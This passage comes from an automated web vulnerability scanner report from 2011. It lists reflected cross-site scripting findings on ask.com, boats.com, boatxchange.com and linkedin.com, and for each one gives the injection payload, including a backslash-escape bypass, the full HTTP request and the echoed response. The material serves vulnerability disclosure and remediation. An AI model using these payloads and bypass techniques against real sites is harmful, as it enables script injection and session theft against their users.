var _matchUrl = '/afc-match?q=regulator+boat&page=1&ac=1082&qid=AE64B4C82E8A9CAB1E99DED66206DAB7&qsrc=167&dm=all&qrt=2&lid=5490&o=0&l=dir1afd7';alert(1)//178827696e9';

_matchUrl+= "&userip=173.193.214.243";

_matchUrl+="&losid=a&locid=p&lodid=us";

...[SNIP]...

3.75. http://www.ask.com/pictures [q parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ask.com
Path:	/pictures

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef4cb\'%3b4d01c24067b was submitted in the q parameter. This input was echoed as ef4cb\\';4d01c24067b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /pictures?qsrc=167&o=0&l=dir&q=regulator+boatef4cb\'%3b4d01c24067b&v=14 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:46:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:46:52 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ2OjUyLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:46:52 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:46:52 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 59101

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>

...[SNIP]...
';
google_language = '';
google_country = '';
google_encoding = 'utf8';
google_safe = 'high';
google_adtest = 'off';
google_hints = 'regulator boatef4cb\\';4d01c24067b';
google_kw = 'regulator boatef4cb\\';4d01c24067b';
google_kw_type = 'broad';

var oScript = document.getElementById('bannerAd_ctrScript');

oScript.setAttribute(
...[SNIP]...

3.76. http://www.ask.com/pictureslanding [l parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ask.com
Path:	/pictureslanding

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a2ff'%3balert(1)//060dbcc8357 was submitted in the l parameter. This input was echoed as 2a2ff';alert(1)//060dbcc8357 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /pictureslanding?o=0&l=dir2a2ff'%3balert(1)//060dbcc8357 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cu.wz=0; gcht=; gc=; tbe=1; accepting=1; user=o=0&l=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; gct=; qc=0;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:13:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:13:26 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: user="o=0&l=dir2a2ff';alert(1)//060dbcc8357"; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjI2LVVUQw%3D%3D&po=0&pp=dir2a2ff%27%3Balert%281%29%2F%2F060dbcc8357; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:26 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:26 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Set-Cookie: ldpt=porg=5488|0~5489|0~5490|0~5396|0~5397|0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:26 GMT; Path=/
Content-Length: 58641

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>

<tit
...[SNIP]...

var _matchUrl = '/afc-match?q=&page=1&ac=24&qid=A85CEC08BA14E9370EACEFB56AB8D916&qsrc=121&dm=all&qrt=2&lid=&o=0&l=dir2a2ff';alert(1)//060dbcc8357';

_matchUrl+= "&userip=173.193.214.243";

_matchUrl+= "&wzinfo=no";

...[SNIP]...

3.77. http://www.ask.com/web [q parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ask.com
Path:	/web

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c1c7\'%3bfb820ccc7e7 was submitted in the q parameter. This input was echoed as 8c1c7\\';fb820ccc7e7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /web?q=Is+there+lead+in+reusable+grocery+bags%3F8c1c7\'%3bfb820ccc7e7&gc=1&qsrc=3066&o=0&l=dir HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cu.wz=0; gcht=; gc=; tbe=1; accepting=1; user=o=0&l=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; gct=; qc=0;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:14:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: gcc=U2hvcHBpbmcvQXJ0c19hbmRfRW50ZXJ0YWlubWVudC9BcnRzX2FuZF9DcmFmdHNfU3VwcGxpZXM.; Domain=.ask.com; Expires=Sat, 26-Feb-2011 19:14:33 GMT; Path=/
Set-Cookie: clc=U2hvcHBpbmcvQXJ0c19hbmRfRW50ZXJ0YWlubWVudC9BcnRzX2FuZF9DcmFmdHNfU3VwcGxpZXM.; Domain=.ask.com; Expires=Sat, 26-Feb-2011 19:14:33 GMT; Path=/
Set-Cookie: ldst=sorg=-1|1296155673227; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:14:33 GMT; Path=/
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:14:33 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qh=1-SXMrdGhlcmUrbGVhZCtpbityZXVzYWJsZStncm9jZXJ5K2JhZ3MlM0Y4YzFjNyU1QyUyNyUzQmZiODIwY2NjN2U3; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE0OjMzLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:14:33 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:14:33 GMT; Path=/
Set-Cookie: qc=1; Domain=.ask.com; Path=/
Set-Cookie: ldpt=porg=5488|0~5489|0~5490|0~5396|0~5397|0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:14:33 GMT; Path=/
Content-Length: 78834

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>

<title>Ask.com - Wha
...[SNIP]...
e = 'medium';
google_adtest = 'off';

google_ad_section = 'default';

google_page_url = '';

google_hints = 'Is there lead in reusable grocery bags?8c1c7\\';fb820ccc7e7';
google_kw = '';

google_kw_type = 'broad';

}else{

google_ad_client = 'aj-cat';
google_ad_channel = 'hobbies_and_activities-craft
...[SNIP]...

3.78. http://www.ask.com/web [qid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ask.com
Path:	/web

Issue detail

The value of the qid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0073'%3balert(1)//d6de0c6a20 was submitted in the qid parameter. This input was echoed as f0073';alert(1)//d6de0c6a20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /web?q=regulator+boat&qsrc=0&frstpgo=0&o=0&l=dir&qid=98661B091CD7946B37C24EBBC344D14Af0073'%3balert(1)//d6de0c6a20&page=2&jss= HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:45:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:45:59 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ1OjU5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:59 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:59 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 123872

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>

<title>Ask.com - Wha
...[SNIP]...
<script type="text/javascript">
var _psBack = '« Prev';
var _psForward = 'Next »';
var _psQueryID = '98661B091CD7946B37C24EBBC344D14Af0073';alert(1)//d6de0c6a20';
var _psQuerySource = '0';
var _psSiteID = '';
</script>
...[SNIP]...

3.79. http://www.boats.com/boat-transport/index.jsp [yw_country parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.boats.com
Path:	/boat-transport/index.jsp

Issue detail

The value of the yw_country request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e0f7"><script>alert(1)</script>73e292f6ad1 was submitted in the yw_country parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boat-transport/index.jsp?source=yachtworld&yw_country=US6e0f7"><script>alert(1)</script>73e292f6ad1 HTTP/1.1
Host: www.boats.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:49:21 GMT
Server: Apache
Set-Cookie: Apache=10.71.0.26.1296157761473052; path=/; expires=Sat, 29-Jan-11 19:49:21 GMT; domain=.boats.com
Cache-Control: private
Content-Language: en-US
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats.listing_search_country_id=100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats.listing_search_country_id_us=100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats.active_sub_domain_listing_search_country_id=US; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats.listing_search_country_id=100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats_temp_info=lf:ywlf; domain=.boats.com; path=/
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: JSESSIONID=bcKRwwsrrCjc; path=/
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: SL_Audience=693|Accelerated|109|1|0;Expires=Sat, 26-Jan-13 19:49:21 GMT;Path=/;Domain=.boats.com
Set-Cookie: SL_UVId=2B10123D92E17E5C;path=/;
Set-Cookie: SL_NV1=1|1;Expires=Sat, 29-Jan-11 07:49:21 GMT;Path=/;Domain=.boats.com
X-SL-CompState: Recompiling

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html>
<head><script>var __$1a49={BaseUrl:(("https:"==document.location.protocol)?"https:":"http:")+"//analytics.strangeloopnetworks.com/",Gi
...[SNIP]...
<a href="http://www.boats.com/boat-transport/index.jsp?source=yachtworld&yw_country=us6e0f7"><script>alert(1)</script>73e292f6ad1">
...[SNIP]...

3.80. http://www.boats.com/boat-transport/index.jsp [yw_country parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.boats.com
Path:	/boat-transport/index.jsp

Issue detail

The value of the yw_country request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33d06'%3balert(1)//ec734b2bd35 was submitted in the yw_country parameter. This input was echoed as 33d06';alert(1)//ec734b2bd35 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /boat-transport/index.jsp?source=yachtworld&yw_country=US33d06'%3balert(1)//ec734b2bd35 HTTP/1.1
Host: www.boats.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:49:21 GMT
Server: Apache
Set-Cookie: Apache=10.71.0.26.1296157761823561; path=/; expires=Sat, 29-Jan-11 19:49:21 GMT; domain=.boats.com
Cache-Control: private
Content-Language: en-US
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats.listing_search_country_id=100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats.listing_search_country_id_us=100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats.active_sub_domain_listing_search_country_id=US; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats.listing_search_country_id=100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats_temp_info=lf:ywlf; domain=.boats.com; path=/
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: JSESSIONID=abnezuav6TX4; path=/
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: SL_Audience=599|Accelerated|669|1|0;Expires=Sat, 26-Jan-13 19:49:21 GMT;Path=/;Domain=.boats.com
Set-Cookie: SL_UVId=2B10123DC2FB55B2;path=/;
Set-Cookie: SL_NV1=1|1;Expires=Sat, 29-Jan-11 07:49:21 GMT;Path=/;Domain=.boats.com
X-SL-CompState: Recompiling

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html>
<head><script>var __$1a49={BaseUrl:(("https:"==document.location.protocol)?"https:":"http:")+"//analytics.strangeloopnetworks.com/",Gi
...[SNIP]...
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.yachtworld.com/us33d06';alert(1)//ec734b2bd35/transport.html';
OAS_listpos = 'Right1,Top1';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String
...[SNIP]...

3.81. http://www.boatxchange.com/pboats/browse/Make/Regulator/search.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.boatxchange.com
Path:	/pboats/browse/Make/Regulator/search.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ff2dc<script>alert(1)</script>051e6b7c2ed was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pboats/browse/Makeff2dc<script>alert(1)</script>051e6b7c2ed/Regulator/search.html HTTP/1.1
Host: www.boatxchange.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 27 Jan 2011 19:43:53 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8n PHP/5.2.3 mod_jk/1.2.30
Set-Cookie: JSESSIONID=0738E8BB69B4576E7DFEB8F02B3A22A5.tomcat1; Path=/pboats
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 19767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="iso-8859-1"?><html xmlns="http://www.w3.org/199
...[SNIP]...
<pre>
errorMessage: null
Exception: java.lang.RuntimeException: Problem parsing path info:/browse/Makeff2dc<script>alert(1)</script>051e6b7c2ed/Regulator/search.html
at com.primo.gnav.mvc.GnavBrowseCommandController.createFilteredCommand(GnavBrowseCommandController.java:189)
at com.primo.gnav.mvc.GnavSearchCommandController.handle(GnavSearc
...[SNIP]...

3.82. http://www.boatxchange.com/pboats/browse/Make/Regulator/search.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.boatxchange.com
Path:	/pboats/browse/Make/Regulator/search.html

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 631f9<script>alert(1)</script>38d066a2dec was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pboats/browse/Make/Regulator631f9<script>alert(1)</script>38d066a2dec/search.html HTTP/1.1
Host: www.boatxchange.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 27 Jan 2011 19:43:54 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8n PHP/5.2.3 mod_jk/1.2.30
Set-Cookie: JSESSIONID=70B1F81A76B600538F4CCDD338B20EB4.tomcat1; Path=/pboats
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 19767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="iso-8859-1"?><html xmlns="http://www.w3.org/199
...[SNIP]...
<pre>
errorMessage: null
Exception: java.lang.RuntimeException: Problem parsing path info:/browse/Make/Regulator631f9<script>alert(1)</script>38d066a2dec/search.html
at com.primo.gnav.mvc.GnavBrowseCommandController.createFilteredCommand(GnavBrowseCommandController.java:189)
at com.primo.gnav.mvc.GnavSearchCommandController.handle(GnavSearchCommandCo
...[SNIP]...

3.83. http://www.boatxchange.com/pboats/browse/Make/Regulator/search.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.boatxchange.com
Path:	/pboats/browse/Make/Regulator/search.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ef1d6<script>alert(1)</script>dbd5bb8b76 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pboats/browse/Make/Regulator/ef1d6<script>alert(1)</script>dbd5bb8b76 HTTP/1.1
Host: www.boatxchange.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 27 Jan 2011 19:43:56 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8n PHP/5.2.3 mod_jk/1.2.30
Set-Cookie: JSESSIONID=EE13D5B4D07CE6426B8A05BBA4EAD214.tomcat1; Path=/pboats
Content-Language: en
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 18869

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="iso-8859-1"?><html xmlns="http://www.w3.org/199
...[SNIP]...
<pre>
errorMessage: null
Exception: java.lang.RuntimeException: Problem parsing path info:/browse/Make/Regulator/ef1d6<script>alert(1)</script>dbd5bb8b76
at com.primo.gnav.mvc.GnavBrowseCommandController.createFilteredCommand(GnavBrowseCommandController.java:189)
at com.primo.gnav.mvc.GnavSearchCommandController.handle(GnavSearchCommandController.jav
...[SNIP]...

3.84. https://www.linkedin.com/secure/login [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.linkedin.com
Path:	/secure/login

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b47a6'-alert(1)-'f2583992d5c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /secureb47a6'-alert(1)-'f2583992d5c/login HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
